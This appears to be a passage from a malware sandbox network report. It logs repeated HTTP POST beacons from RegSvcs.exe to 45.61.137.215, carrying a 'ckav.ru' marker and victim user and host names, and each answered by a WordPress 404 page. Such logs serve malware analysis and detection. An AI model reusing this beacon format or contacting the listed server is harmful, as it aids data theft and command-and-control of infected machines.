47	192.168.2.9	49762	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:12.009845018 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:12.014758110 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:14.588062048 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:12 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:14.588083982 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:14.588115931 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:14.588128090 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:44:14.588138103 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:44:14.588156939 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:44:14.588169098 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:14.588217020 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:14.588228941 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:14.588561058 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.9	49763	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:14.760596991 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:14.765880108 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:17.262957096 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:15 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:17.262975931 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:17.262986898 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:17.263000011 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:17.263010979 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:17.263024092 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:44:17.263053894 CEST	776	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:44:17.263077021 CEST	1236	IN	Data Raw: 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 Data Ascii: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
May 29, 2024 15:44:17.263088942 CEST	1236	IN	Data Raw: 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 Data Ascii: d-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color
May 29, 2024 15:44:17.263102055 CEST	1016	IN	Data Raw: 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f Data Ascii: portant;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.9	49764	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:17.418906927 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:17.423820972 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:20.001450062 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:20.001477957 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:20.001490116 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:20.001502037 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:20.001513958 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:20.001524925 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:20.001534939 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:44:20.001543999 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:44:20.001554012 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
